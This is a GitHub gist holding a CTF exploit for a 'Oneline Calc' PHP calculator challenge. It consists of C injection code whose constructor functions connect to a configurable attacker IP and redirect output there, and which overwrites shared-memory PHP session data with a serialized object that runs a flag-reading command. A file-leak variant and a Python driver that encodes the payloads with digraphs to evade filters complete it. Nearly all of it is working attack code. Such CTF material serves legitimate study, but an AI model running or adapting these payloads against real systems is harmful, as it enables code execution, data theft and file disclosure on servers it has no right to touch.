Skip to content

Instantly share code, notes, and snippets.

@wupco
Forked from icchy/exp.c
Created September 2, 2019 09:49
Show Gist options
  • Save wupco/1cce4288483fdce10bf6fe2e12f625f2 to your computer and use it in GitHub Desktop.
Save wupco/1cce4288483fdce10bf6fe2e12f625f2 to your computer and use it in GitHub Desktop.
Oneline Calc
123;
return 123;
}
extern void *opendir(const char *);
extern void *readdir(void *);
extern void *shmat(int, const void *, int);
typedef struct {
ino_t d_ino;
off_t d_off;
unsigned short d_reclen;
unsigned char d_type;
char d_name[256];
} dirent;
struct sockaddr {
unsigned short int sa_family;
char sa_data[14];
};
struct in_addr {
uint32_t s_addr;
};
struct sockaddr_in {
unsigned short int sin_family;
unsigned short sin_port;
struct in_addr sin_addr;
char sin_zero[8];
};
int sock;
int data_send(char *data, int len) {
return send(sock, data, len, 0);
}
__attribute__((constructor)) void setup1() {
int r;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = 2;
sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
sa.sin_port = 0x901f; /* and port */
sock = socket(2, 1, 0);
connect(sock, (struct sockaddr*)&sa, sizeof(sa));
dup2(sock, 1);
}
__attribute__((constructor)) void f() {
void *dir = (void*)opendir("/tmp");
void *de;
while (1) {
de = readdir(dir);
if (de == NULL) break;
char *s = ((dirent*)de)->d_name;
if (s[0] == 's' && strlen(s) == 7) {
char p[256];
snprintf(p, 255, "/tmp/%s", s);
int id = shmget(ftok(p, 'a'), 0, 0);
int i = 0;
void *data = shmat(id, 0, 0);
void *var = data+64;
void *size = var-16;
char *payload = "__PAYLOAD__";
if (*((uint64_t*)size) != 26) {
continue;
}
*((uint64_t*)size) = strlen(payload);
for (i = 0; i < *((uint64_t*)size); i++) {
((char*)var)[i] = payload[i];
}
}
}
}
int g(){
int res = 0
123;
}
__asm__(".section .rodata\n"
".global bin_start\n"
".type bin_start, @object\n"
".balign 16\n"
"bin_start:\n"
".incbin \"__PATH__\"\n"
".global bin_end\n"
".type bin_end, @object\n"
".balign 1\n"
"bin_end:\n"
".byte 0\n"
);
extern const __attribute__((aligned(16))) void *bin_start;
extern const void* bin_end;
struct sockaddr {
unsigned short int sa_family;
char sa_data[14];
};
struct in_addr {
uint32_t s_addr;
};
struct sockaddr_in {
unsigned short int sin_family;
unsigned short sin_port;
struct in_addr sin_addr;
char sin_zero[8];
};
int sock;
int data_send(char *data, int len) {
return send(sock, data, len, 0);
}
__attribute__((constructor)) void setup1() {
int r;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = 2;
sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
sa.sin_port = 0x901f; /* and port */
sock = socket(2, 1, 0);
connect(sock, (struct sockaddr*)&sa, sizeof(sa));
dup2(sock, 1);
}
__attribute__((constructor)) void f() {
printf("%s\n", &bin_start);
}
int g(){
int res = 0
import requests
url = 'http://galileo.local:10080/calc.php'
url = 'http://192.168.121.171:10080/calc.php'
url = 'http://localhost:10080/calc.php'
url = 'http://olc.chal.ctf.westerns.tokyo/calc.php'
# url = 'http://192.168.121.171/calc.php'
def exp():
payload = open('exp.c', 'rb').read()
cmd = "/readflag2>/var/tmp/0j29fqj30f"
obj = 'a:2:{s:9:"__started";i:1;i:2;O:4:"Calc":3:{s:3:"bin";s:%d:"";%s;";s:3:"src";s:6:"abcdef";s:3:"tmp";R:4;}}' % (3 + len(cmd), cmd)
obj = obj.replace('{', '\\x7b').replace('}', '\\x7d').replace('"', '\\"')
payload = payload.replace('__PAYLOAD__', obj)
payload = payload.replace('{', '<%')
payload = payload.replace('}', '%>')
payload = payload.replace('#', '%:')
payload = payload.replace('\n', ' ')
req = requests.get(url, params={
'formula': payload
})
print(req.content)
def leak(path):
payload = open('leak.c', 'rb').read().replace('__PATH__', path)
payload = payload.replace('{', '<%')
payload = payload.replace('}', '%>')
payload = payload.replace('#', '%:')
payload = payload.replace('\n', ' ')
req = requests.get(url, params={
'formula': payload
})
print(req.content)
leak('./calc.php')
exp()
leak('/var/tmp/0j29fqj30f')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment